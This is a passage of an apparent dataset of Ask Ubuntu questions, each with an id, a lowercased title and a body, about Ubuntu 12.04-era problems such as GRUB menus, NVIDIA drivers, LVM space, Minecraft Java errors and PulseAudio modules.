aes256-ctr encryption ecdh-sha2-nistp521 key exchanges hmac-sha2-512 message authentication 521-bit ecdsa keys for server and clients password logins disabled all types of forwarding/tunneling disabled pam disabled i ca n't really detail my ecryptfs setup because i have n't changed anything there ; encryption was set up with the defaults implemented by the ubuntu installation . any ideas ?
165609	how do i disable an update of a single item ?	i have libreoffice installed with the faenza icon hack . the hack uses the crystal icon pack . whenever i update the crystal icon package , it removes the hack . is there a way to stop this from happening except manually deselecting it for every update ? just to be clear . this is what i do n't want : i do n't want to uninstall libreoffice . i do n't want to uninstall crystal icon theme . i simply want to disable the crystal icon theme from ever updating again . is this possible ? thanks !
165612	updates in 12.04 mess up nvidia drivers	i am using the proprietary nvidia cuda developer 's drivers on my ubuntu 12.04 gnome 3 shell , from here : http : //developer.download.nvidia.com/compute/cuda/4_2/rel/drivers/devdriver_4.2_linux_64_295.41.run everything works well until i perform an update to the system ( via the update manager ) . whenever something ( i think xorg server ) gets an update , the gnome shell boots only to 'classic mode ' . booting to recovery console and reinstalling the proprietary drivers solves the problem . is there any way to tell the update manager to never update/overrun the devdrivers ? it 's really a pain having to reinstall the drivers every time i update the system .
165614	is it safe to delete a lost+found folder ?	i have an empty seperate partition used for my vhd/virtualbox . mounted at /mount/win7 . i 've deleted everything now and there 's a lost+found folder left over . it takes up about 5gigs is it safe to remove a lost and found folder ?
165615	can not get hidden grub2 menu to appear ?	i have a dual boot ( ubuntu/ubuntu ) system and have configured grub2 to hide the boot menu unless i press the shift key ( or another key ) . here is my configuration in /etc/default/grub : grub_default=0 grub_hidden_timeout=3 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' however , no matter what i do , or what key i press , or when i press it , it boots up into the default os choice and i never see the grub menu . i always do a sudo update-grub after changing these options . i 've tried extending the hidden timeout to 15 seconds and my system did n't change ... its like that value is just not being honored -- the system just boots up right away . i do have a software raid 1 configuration , but each drive is mirrored and they both have grub , so that ca n't be it . any ideas ?
165618	how to change file association for files opened in dolphin from command line in gnome ?	i would like to change several default applications for files opened in dolphin . i know i could do it manually with kcmshell4 filetypes , keditfiletype or however else but is there a way how to change file associations for dolphin in terminal ? would be nice if i did n't have to do it manually for every single file type every time i change distribution . kde-open successfully ignores everything set with xdg-mime and all following files : ~/.local/share/applications/mimeapps.list ~/.local/share/applications/defaults.list /usr/share/applications/defaults.list i guess one way how to solve this would be to detach dolphin from using kde-open and use gnome-open or gvfs-open instead but i have no idea how to do that , if possible .
165620	how do i make an iso from a disc ?	i have a disc here , and i need to take an iso image of the disc . is there a piece of software i can use to get the image from the disc , or does ubuntu ship with one ?
165626	how to enable javascript on xdg-open	i am trying to open a url using xdg-open but the terminal says , so how do i enable the javascript ?
165627	nautilus is really slow	nautilus used to be lightning fast.now it 's dead slow . i have tried upgrading the video card but that does not seem to be the problem . also i found that there was a problem with the dropbox uninstall , finally i replace it with pcmanfm which appears to be much faster but the down side is that i no longer have the gwibber social client and a lot of stuff do n't work like they use to . also i completely removed nautilus and could n't even login to ubuntu to install again nautilus.how can i remove or repair nautilus , and use pcmanfm instead ? i have a dell inspiron 1440 3gb ram / disk 300gb / additionally , why does nautilus run fast when i run it as root ? there are no usb devices attached to my computer . thanks in advance
165628	how to get the default theme using python `` gtk '' ( not `` gtk '' ) ?	when writing a lens for unity in python i got stuck at replacing `` import gtk '' with `` from gi.repository import gtk '' because i ca n't find the equivalence for the funcion : gtk.icon_theme_get_default ( ) . for example : import gtk , gio if __name__ == `` __main__ '' : mimetype= `` text/x-c '' print `` mime= '' , mimetype iconname = gio.content_type_get_icon ( mimetype ) theme = gtk.icon_theme_get_default ( ) print `` ico names= '' , iconname.get_names ( ) icon = theme.choose_icon ( iconname.get_names ( ) , 48 , 0 ) print `` ico= '' , icon.get_filename ( ) -- -- -- - prints -- -- -- mime= text/x-c ico names= [ 'text-x-c ' , 'gnome-mime-text-x-c ' , 'text-x-generic ' ] ico= /usr/share/icons/humanity/mimes/48/text-x-c.svg i have replaced with success the following 2 lines : from gi.repository import gio , gtk iconname = gio.content_type_get_icon ( mimetype ) but i ca n't find a way to translate : theme = gtk.icon_theme_get_default ( ) any help will be appreciated .
165634	i ca n't navigate to my files using any application ?	i ca n't figure out what triggered this , whether it was an software update or something else , but i can no longer navigate to my files from any application . when i am in an application and i want to open a file in a sub-folder , i click/double click on the folder and nothing happens . if the file is a root folder like home or documents then there are no issues . what is important to note , i can access my files in nautilus with no issues , so to be clear , this only occurs when i am navigating to files using an application . ( tried libre office , shotwell ( import ) , clementine , thunderbird ( attachment ) , gramps ( media import ) as an example . i have checked my permissions and everything is fine . question update : i have made some progress since i originally asked the question . i took the advice in some of the comment to change my theme , which i did from omg to ambience and now i can navigate using the now visible open button . while this goes some-way to resolving the issue i still can not click/double click on a sub-folder to open it as i could before . below is a screen shot of my folder structure in home/documents and i am trying to click/double click on the folders i have created within .
165637	how do i enable writing in indian languages ?	i am looking for a step by step method for enabling write in indian languages ( hindi and gujarati ) in ubuntu applications ( browser , libreoffice , pidgin etc.. ) . could anyone please provide me a method for beginner to do it or simply direct me to the one if you know ?
165638	if i install wicd will my computer automatically uninstall network manager ?	i 'm running ubuntu 12.04 on a compaq evod500 . my computer randomly loses connection while the other computers in the house are still connected , so i know the problem is specific to my box . the other boxes are running windows xp . i think network manager might be the problem and would like to try wicd , but i 'm concerned that i might not be able to revert back to network manager if i need to . let me know if more info is needed . thanks .
165643	are centos programs compatible with ubuntu ?	it 's a long story , but it ends with me having ubuntu 12.04 installed on my compaq evo d500 computer and a bunch of centos programs on a thumb drive . i was just wondering if these would be compatible with ubuntu . i usually like to ask a question before i possibly crash my system .
165652	ubuntu running too slow	my specs : amd athlon 4400+ 2.11 ghz 2 gb ram ddr2 ati radeon hd 3600 512 mb 320 gb hdd ( 2gb swap ) os ubuntu 12.04 64-bit , fresh install from ubuntu dvd i have a problem : my pc is running randomly slow . i installed ubuntu 12.04 today , it installed fine ( it took a long time , then the installation program was removing all the languages - almost 2 hours total ) . i selected to install en ( not my native language , but i want en ) and ubuntu started downloading all arabic and some chinese for all libreoffice apps and gnome ... annoying . now ubuntu looks just fine , i got web gl running , but all screen is flickering and my mouse cursor randomly stucking , virtualbox made my ubuntu crash . when i open chromium , it all becomes laggy for a while . flash videos and whole youtube looks terrible and laggy . also trying to run hd video ( 1080p ) makes ubuntu so laggy and that video as well . in default movie player hd video is laggy and low quality . of course i use vlc media player ( the best one for me ) and there the video runs just fine , but i have very bad feeling when watching it , it is kind of slow like all ubuntu and sometimes it got stuck . i also tried 3d benchmark ( the gears on the sides of a cube ) and spent a lot of time messing with terminal and trying some configs , nothing helped . i want an os with gui and not typing in terminal like writing a nowell . if i wanted this , i would install gentoo or something similar ( i tried gentoo , nice distro ) . i do not want to install restricted graphics drivers . in one hour i scouted through all preinstalled programs in ubuntu , also made all ubuntu one accounts and so . now i only want to make it running fast ! please help me .
165653	issues with compiz on ubuntu 12.04 ! which configuration should i choose ?	i am running bricscad v12 ( info here ) and i realized that when i zoom in too much and have a specific command active like a line , i am switching to another workspace . so , i tried to log in with a classic-session or a 2d unity-session both without effects , and i realized that the problem did not exist ! so , the problem probably is from compiz , right ? what can we do now , my friends ? where should i report a bug ? i a compiz support forum , in bricsys company support or in canonical support ? i am using ubuntu 12.04 64bit and the problem exists from the 10.10 version that i started my serious linux experience . so , in this lts version i hope that it can be fixed anyway ! i want your help , thanks very much !
165657	awesome wm menu missing firefox	after sudo apt-get install awesome awesome-extra and logging into it ( with no previous configuration that i know of ) , there 's no menu entry for firefox . all my other stuff is there - mutt , meld , jedit , boinc , etc. , only firefox is missing . i have no ~/.config/awesome/ directory , so there should be no override in place .
165659	mount /usr on new partition	i use ubuntu 11.04. df filesystem 1k-blocks used available use % mounted on /dev/sda1 9611492 7553508 1569744 83 % / none 1665832 644 1665188 1 % /dev none 1672460 1436 1671024 1 % /dev/shm none 1672460 648 1671812 1 % /var/run none 1672460 0 1672460 0 % /var/lock /dev/sda3 67285624 19445284 44422384 31 % /home im starting to be a bit short on / partition . i have a lot of free space on my disk . i would like to mount /usr and /opt on new partitions without loosing the data . but i have no idea of how doing this . can you help me .
165660	why is the gcc 4.7 ppa not upgrading to 4.7.1 ?	i would like to install from repository ( without compilation from source ) the latest g++ 4.7.1 on ubuntu 12.04 . i know i can install g++ 4.7.0 according to this tutorial . i have also found the g++ 4.7.1 exists in the same repository as mentioned in the tutorial here . if there is newer version in the repository , why the previously installed version ( 4.7.0 ) is not updated when running the `` update manager '' ? how do i install 4.7.1 ? thank you
165662	how do i use ubuntu 's web application integration ?	i 've read that ubuntu will support web applications out of the box , how can i set this up on my computer to play with it ?
165665	installing win7 x64 in virtualbox - error driver device missing	after creating a vhd and going through that process i 'm unable to install win7 x64 . i 've went through various settings and trying to get it right . it 'll boot the windows install but then indicate the following error ( image included too ) : a required cd/dvd drive device driver is missing . if you have a driver floppy disk , cd , dvd , or usb flash drive , please insert it now . note if the windows installation media is in the cd/dvd drive , you can safely remove it for this step . i 've also set up my storage tree like so : would anyone know what the issue could be ? it 's asking for cd/dvd device drivers and i 'm unable to install .
165670	is my battery really near the point of dead ?	if my battery is 100 % i only have 30mins left . this are my stats : energy : 17,6wh energy when empty : 0,0wh energy when full : 19,3wh energy design : 48,8wh rate : 34,6w voltage : 11,0v time to empty 30,5minutes percentage : 91,4 % capacity : 39,5 % my question is : does the stats above really say that my battery just has 40 % of what it should be after it leave the factory ?
165676	how do i fix a `` e : the method driver /usr/lib/apt/methods/http could not be found . '' error ?	i tried updating my packages from the terminal and this is what i got : $ sudo apt-get update e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . e : the method driver /usr/lib/apt/methods/http could not be found . what does this mean ? i 'm using the united states mirror an i 've tried using the main server for the mirror and i keep getting the same result is this because there are no updates ?
165677	which book should i buy to learn file system in ubuntu ?	i am very new to ubuntu and linux and looking to learn ubuntu/linux . which book should i buy to learn file system in ubuntu in particular and linux in general ?
165678	what is the best way to dual-boot windows and ubuntu ?	i have recently installed ubuntu 12.04 in dual-boot with windows 7 but i am having some problems . i installed grub in the mbr ( as it is often recommended ) and so grub was the boot-loader that appeared at startup . but i wanted windows boot-loader to appear at startup so i installed easybcd and added an entry of grub into the windows boot-loader and then then did the 'write mbr ' and i got my desired results . today , i installed windows service pack updates and i was no longer able to boot into ubuntu ( maybe because the mrb was over-written by the update ) . then i had to work my way out using grub rescue commands and then booting into ubuntu and repairing boot ( thanks to askubuntu ) so here 's my question , each time i update windows there is a chance of loosing grub from the mbr and i 'll have to do all those painful steps again to boot into ubuntu . what 's the solution of this problem ? i did some research and found out this useful post to avoid the problem http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ but i am not sure if i should try this because installing grub in some partition other than the mbr is not recommended . ( i once tried to do that in terminal but got an error message saying `` it 's not a good idea what you 're trying to do '' ) regards
165679	how to manage available wireless network priority ?	i 'd like to move up and down available wireless access points , setting priorities as we can do in ms windows . i ca n't remember to have ever succeded in this since using network-manager . maybe something with conf files is possible ... i 'm not interested in different netowrk managers .
165688	how do i get the browser to reask me to integrate with a website ?	i 'm using webapp integration and i accidentally clicked `` no '' when asked if i want to integrate with the website . how can i have firefox or chrome reask me to integrate the site with ubuntu ?
165698	multiple bars and dual monitor not working after driver instalation	installed the drivers acording to the manual setup in here ran amdcccle and setup the dual display , enabled xinerama so i can move stuff between monitors and now my desktop looks like and the second monitor is white , i can move the mouse to it , but not the windows
165700	quickly application how to call function from other .py files ?	i 'm new to programing and i 'm writing my first python program using quickly . i have added new window and on this new window i want to call function from main window ? i google for it and all i found is that i nned to import it but it didnt know how . here is what i put new window : from magic_ebay.magicebaywindow import magicebaywindow and i get error : importerror : can not import name magicebaywindow magicebaywindow.py is the name of main window in my program and i want to call function from magicebaywindow.py but on other window . ( dont know if it make any sense : ) ) thanks for any help !
165702	how can i prevent ubuntu from mounting particular partitions/deivices ?	i would like to stop ubuntu from mounting my other ( windows ' ) partitions automatically ( since i do not need it really often - and especially i would like not to automount `` system reserved '' partition for windows . there is a similar question here how can i stop ubuntu 12.04 from mounting fedora 16 's swap partition ? but ! i do not have these partitions added in /etc/fstab . how can i do it ? for proof , my /etc/fstab proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda7 during installation uuid=1384cee0-6a71-4b83-b0d3-1338db925168 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=e3729117-b936-4c1d-9883-aee73dab6729 none swap sw 0 0 # -- -- -- my windows d drive -- -- -- -- -- i want to kep it uuid=98e8b14de8b12a80 /media/d ntfs defaults , errors=remount-ro 0 0
165721	camera protocol does n't work	my android device is set to use the media player mode when the usb cable is plugged in . when i plug it in , it launches the media player thingy on my device and it shows up in the `` device notifier '' applet . it shows up in dolphin as two entries : samsung galaxy nexus/galaxy s i9000 , android 4.0 updates and the same thing , but without the slash . then , when i click on the first one , it says : the process for the camera protocol died unexpectedly . and it just sits there and tries to load . when i click the second one , it says : unknown error unknown model and it just sits there and tries to load . is there any way to fix this , or is this just a bug in kubuntu ? i have a samsung yp-g1 ( stock rom/kernel , rooted ) and am running precise on my computer .
165722	os-prober fails to identify a linux system so i need to write a custom grub2 menu entry as a workaround , how ?	i want to add a custom menu to grub2 like this ( as /etc/grub.d/40_custom ) : # ! /bin/sh exec tail -n +3 $ 0 # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry `` arch linux '' { ... .some data here ... .. } and what i need is the `` ... .some data here ... .. '' some difficulties : when booting the drive order changes from bios e.g . sometimes the disk with the partition is /dev/sda and sometimes it is /dev/sdg . so i use the uuids for the partition . update : last time is was /dev/sdc ! the linux system uses a separate boot partition i.e . partition 1 is the /boot partition , partition 2 is the /root partition and extended partition 4 is the /home partition here blkid output from when linux thought the disk was /dev/sdg ... /dev/sdg1 : label= '' arch_boot '' uuid= '' 34a39f15-f1a8-46a3-88e7-00c370c3c6a2 '' type= '' ext2 '' /dev/sdg2 : label= '' arch_root '' uuid= '' c670b0cf-a644-48d6-903d-dc3e49395a04 '' type= '' ext2 '' /dev/sdg3 : uuid= '' b36c4dc0-f5d7-488e-80fb-4c2e14313de5 '' type= '' swap '' /dev/sdg5 : label= '' arch_home '' uuid= '' 327900a5-e8f7-4dc4-be52-2f0dd97e3164 '' type= '' ext4 '' /dev/sdg6 : label= '' arch_adjunct '' uuid= '' f65f0ae6-9af2-4767-b223-a199ce96c71a '' type= '' reiserfs '' here 's contents of the linux system ( which had grub legacy until boot-repair overrode the mbr ) : ⋯ @ 64bitws : /media $ ls arch_boot grub initramfs-linux-fallback.img initramfs-linux.img lost+found vmlinuz-linux ⋯ @ 64bitws : /media $ ls arch_boot/grub e2fs_stage1_5 iso9660_stage1_5 minix_stage1_5 stage2 vstafs_stage1_5 fat_stage1_5 jfs_stage1_5 reiserfs_stage1_5 stage2_eltorito xfs_stage1_5 ffs_stage1_5 menu.lst stage1 ufs2_stage1_5 ⋯ @ 64bitws : /media $ ls arch_root aur boot etc lib lost+found mnt proc run srv tmp var bin dev home lib64 media opt root sbin sys usr boot-info at http : //paste.ubuntu.com/1099113/ and at http : //paste.ubuntu.com/1100049/ for each of the cases of different boot orders . i know it can work because it has worked before ... update : i ran os-prober from 10.04 ( 1.38/lucid ) and it worked , it found all linux systems unlike 12.04 os-prober ( 1.51 ) . so i ran boot-repair ( http : //paste.ubuntu.com/1101977/ ) again and it produced the arch linux grub2 menu entry . it loooked like this ( from /boot/grub/grub.conf ) : menuentry 'arch linux ' { insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd6 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 34a39f15-f1a8-46a3-88e7-00c370c3c6a2 linux /boot/vmlinuz-linux root=uuid=670b0cf-a644-48d6-903d-dc3e49395a04 initrd /boot/initramfs-linux.img } identical to cumulus007 proposed answer . unfortunately this `` new '' grub.cfg would n't boot arch linux so no answer yet ... last update : it seems that 10.04 's grub3 ( 1.98 ) can not use uuids for booting , and since my hardware 's bios mixes up hard-drive order from boot to boot , actually achieving a boot is a craps shoot ... < ¬ (
165723	partial upgrade 11.10 to 12.04 stuck	help ! stuck within upgrade from 11.10 to 12.04.. it is now running a partial upgrade and just hangs ... usb access and internet access ( via usb wireless ) appears to have dropped out , though i managed to download a sizable amount of update before this - half or more of the upgrades were installed . local loopback rx packets:4 errors : 0 sudo apt-get update failed to fetch ... sudo apt-get install -f no longer required are kdesudo libknewstuff2-4 update-manager-kde python-kde4 edit : one of the sudo commands i did allowed a fresh upgrade ( not partial ) ... maybe sudo dpkg -configure -a ? ? or maybe the following from another forum response : sudo cp /etc/apt/sources.list /etc/apt/sources.list.backup sudo sed -i -e 's/precise/oneiric/g ' /etc/apt/sources.list sudo apt-get update sudo do-release-upgrade the terminal gave me no feedback on those commands , but maybe that enabled the distribution upgrade from fresh . it now appears to be fetching files again ( very slowly ) ... nope , back to the wireless disappearing from ubuntu again , but it 's not the wireless , as i 'm doing fine on windows.. edit : ah , for some reason it depopulated the ssid field in the network settings . simply filled it with the network name . hopefully all is resolved .
165727	is it possible for two processes to access the webcam at the same time ?	i would like to try using cheese in google+ hangouts , and similar configurations , and i would like to know if it is possible for the webcam to be used by two processes to have access to the webcam at the same time . i have not tried it as yet , but before i do , i figured i would ask . so , is it possible ?
165728	when i run sudo lshw in terminal , it asks for my administrator password , but it wo n't accept keyboard input when i try to type ?	i have been trying to run [ sudo lshw ] but it asks [ password for grace : [ ] ] so when i try to type my password , it does n't even come up with any letters , asterisks not does the [ ] move . i typed in my password as normal despite this and pressed [ enter ] but it just said , [ sorry , try again . enter password for grace : [ ] ] but i ca n't type it in ? ! can anybody help ?
165731	move free space out of lvm	i have a 500 gb lvm2 container on a 500 gb hdd which holds a 96 gb root partition ( ext4 ) and a 4 gb swap partition . i made this setup using the alternate cd and set the amount of disk space to be used to 100gb , presuming that the remainder would become available as regular , unencrypted disk space . it turns out that the 400 gb of free disk space is actually encapsulated in the lvm2 container , as disk utility shows me . how do i shrink the lvm2 container so i can utilize this 400 gb ?
165737	how to start minecraft	before starting i want to state that the following 2 links are already done : how can i install minecraft ? how do i install java ? i have the .minecraft folder in my user folder ( /home/cyrex/.minecraft ) . the minecraft.jar file has the executable flag . the minecraft version is the 1.2.5 . i have openjre and openjdk installed with version 1.6 and 1.7 ( 1.6 default ) . already installed the liblwjgl-java library . still the game when i run it via terminal or via the open with option with openjdk 1.6 throws me the following error ( in terminal ) : exception in thread `` main '' java.lang.noclassdeffounderror : org/lwjgl/lwjglexception caused by : java.lang.classnotfoundexception : org.lwjgl.lwjglexception at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : net.minecraft.client.minecraft . program will exit . when i start the game with : java -cp minecraft.jar net.minecraft.launcherframe or with java -xmx1024m -xms512m -cp minecraft.jar net.minecraft.launcherframe ( notice in both cases the m from minecraft is lower case ) it gives me the following error : exception in thread `` main '' java.lang.noclassdeffounderror : net/minecraft/launcherframe caused by : java.lang.classnotfoundexception : net.minecraft.launcherframe at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : net.minecraft.launcherframe . program will exit . does not load and only throws that . what could it be ?
165740	recognising an internal logitech camera	i have an acer aspire from 2007 , it had vista and now has 12.4 . my internal camera has never worked and would like to know how to activate it . cheese does n't pick it up . laptop : ~ $ lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub [ 8086:27a0 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 02 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 2 [ 8086:27d2 ] ( rev 02 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 3 [ 8086:27d4 ] ( rev 02 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 4 [ 8086:27d6 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 02 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 02 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] [ 8086:27c4 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 02 ) 05:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:001c ] ( rev 01 ) 06:01.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 06:04.0 cardbus bridge [ 0607 ] : ene technology inc cb-712/4 cardbus controller [ 1524:1412 ] ( rev 10 ) 06:04.1 flash memory [ 0501 ] : ene technology inc ene pci memory stick card reader controller [ 1524:0530 ] ( rev 01 ) 06:04.2 sd host controller [ 0805 ] : ene technology inc ene pci secure digital card reader controller [ 1524:0550 ] ( rev 01 ) 06:04.3 flash memory [ 0501 ] : ene technology inc flash memory : ene technology inc : [ 1524:0520 ] ( rev 01 ) 06:04.4 flash memory [ 0501 ] : ene technology inc sd/mmc card reader controller [ 1524:0551 ] ( rev 01 )
165744	why does n't the ubuntu iso burned to a cd or copied to a usb work on my mac ?	i just installed a new hard drive and for the life of me , i can not get the .iso file on my usb stick or burned cd to begin the installation process . i keep getting a picture of a folder with a question mark on it ... .
165746	why ca n't i define the size of a gtk.entry embedded in a gtk.toolbar ?	i have embedded a gtk.entry box into a gtk.toolbar , however changing the requested width of practically anything ( i.e . the gtk.toolitem that contains the gtk.entry and the gtk.entry itself ) does n't change the size of the gtk.entry . what is that i 'm doing wrong ?
165751	does failing to build the `` dell-laptop-natty-dkms '' module on 12.04 matter ?	i 'm using 12.04 on my dell laptop . i got a `` system problem detected '' message with title dell-laptop-natty-dkms 1.5.1 : dell-laptop-natty kernel module failed to build . i 'm not sure what this means . was n't natty an older version ? do i need to worry about this ?
165755	what is the equivalent of gksudo in kubuntu/kde ?	in regular ubuntu ( unity/gnome ) , i use gksudo to run gui programs with root privileges . i 'm trying out kubuntu ( or kde ) now -- what do i use ?
165759	ca n't get skydome image to appear	in compiz , when i select an image for the skydome it does n't appear when i rotate the cube . i have jpeg enabled , and the skydome box is checked , but when i go to rotate the cube it 's just the default blue and white background . how can i fix this ?
165765	ca n't make safenet pki client `` find '' my etoken ( 12.04 lts )	well , i need to use the etoken to digitally sign invoices in my country for my company . i have installed safenet 8.1 software , and i am currently running ubuntu 12.04 . the pki client ( from safenet ) ca n't find the etoken . i did a lsusb -v : bus 004 device 002 : id 0529:0600 aladdin knowledge systems etoken pro 64k ( 4.2 ) could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x0529 aladdin knowledge systems idproduct 0x0600 etoken pro 64k ( 4.2 ) bcddevice 1.00 imanufacturer 1 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 20 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 0 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 ** unrecognized : 02 ff my system is updated , all libs for authentication installed ( i believe ) . i did a major research and could not find a solution to this neither on the forums or ask ubuntu.i 'm starting with ubuntu , can do a thing or two , but this is something i ca n't figure out . could someone point me what could be wrong ? i belive that the : **unrecognized : 02ff is the main part of the problem . ( edit ) pcsc-scan ca n't find the etoken , neither opensc-tools -l -n. only when i do a lsusb . ( edit2 ) felipe @ monstro : ~ $ sudo openct-tool list 0 aladdin etoken pro 64k openct can detect it ... but i do n't know how to use this info . reinstalled 'pcsc-lite ' with 'libusb ' and the following config : './configure -- prefix=/usr -- libdir=/usr/lib64 -- localstatedir=/var -- sysconfdir=/etc -- enable-daemon -- enable-libusb -- disable-libhal -- enable- usbdropdir=/usr/lib64/pcsc/drivers'
165766	nvidia geforce 410m error	i bought a new sony laptop , i3-2350m processor 2.30 ghz , and i have a problem while opening splinter cell conviction . it appears to me a screen shows the following thing : video card : nvidia geforce 410m not supported and when i click yes to continue , a black page appears and nothing works . thanks .
165769	user folder on windows empty	after i installed playonlinux , i wanted to install a windows program that is located in my windows user folder that is on different partition . but it was 'empty ' before i knew it ! i do n't know if it 's really gone or just hidden . i 've tried show hidden files and writing the location manually but still failed . please let me know what i can do to fix this .
165777	how do i get rid of this module-combine error in pulse audio	i 've been having problems with my pulse audio server , and recently while investigating , i came across these error messages in /var/log/syslog : jul 20 09:16:40 mythbuntu pulseaudio [ 6555 ] : [ pulseaudio ] module.c : module-combine is deprecated : please use module-combine-sink instead of module-combine ! jul 20 09:16:40 mythbuntu pulseaudio [ 6555 ] : [ pulseaudio ] module-combine.c : we will now load module-combine-sink . please make sure to remove module-combine from your configuration . i looked in /etc/pulse/default.pa for any mention of module-combine , but did not see any . also , i searched the web for elements of the error message and only got links to bug reports with vague discussions . how do i get rid of this module-combine error ?
165778	can i run ubuntu , xubuntu and kubuntu in the same computer ?	i was wondering if i could run those three versions in the same computer and how . i would love having them in my computer .
165784	psychonauts for ubuntu 12.04 wo n't start	i 'm having problems starting psychonauts , from the latest humble indie bundle . every time i try to start it , the launcher icon flashes a bit , and then nothing . here 's the output i 'm getting : stubbed : fix up the rest of the sse code first at detectssesupport ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/mathgeneral.cpp:32 ) stubbed : write me ? at setpclanguage ( /home/icculus/projects/psychonauts/source/game/luatest/unixmain.cpp:120 ) stubbed : fix up the rest of the sse code first at detectcpucaps ( /home/icculus/projects/psychonauts/source/game/luatest/game/pcgameapp.cpp:223 ) stubbed : check lang envr var at _getdefaultgamelanguage ( /home/icculus/projects/psychonauts/source/game/luatest/game/gameapp.cpp:171 ) console created save path : /home/duffy/.local/share/psychonauts write path : workresource stubbed : inline asm at ssemul_4x4_4x4_2arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:710 ) stubbed : inline asm at ssemul_4x4_4x4_3arg ( /home/icculus/projects/psychonauts/source/commonlibs/dfmath/matrix.cpp:698 ) ******** unit test failed ******** transport started daved : nclistensocket : listening on port 40001 stubbed : vk_* at initinputnames ( /home/icculus/projects/psychonauts/source/commonlibs/directx/sdlinput.cpp:1225 ) no joysticks detected sdl_setvideomode ( ) failed : could n't find matching glx visual start up completed in 0.08 seconds segmentation fault ( core dumped ) i 've installed some patch with a 4 in the version ... i ca n't really remember . it did n't help regardless . and i just tried installing the latest nvidia drivers for my geforce 7800 gt ( do n't laugh ) . did n't work . i 've found some similar questions to this on askubuntu , but those solutions did n't seem to work either . please help ?
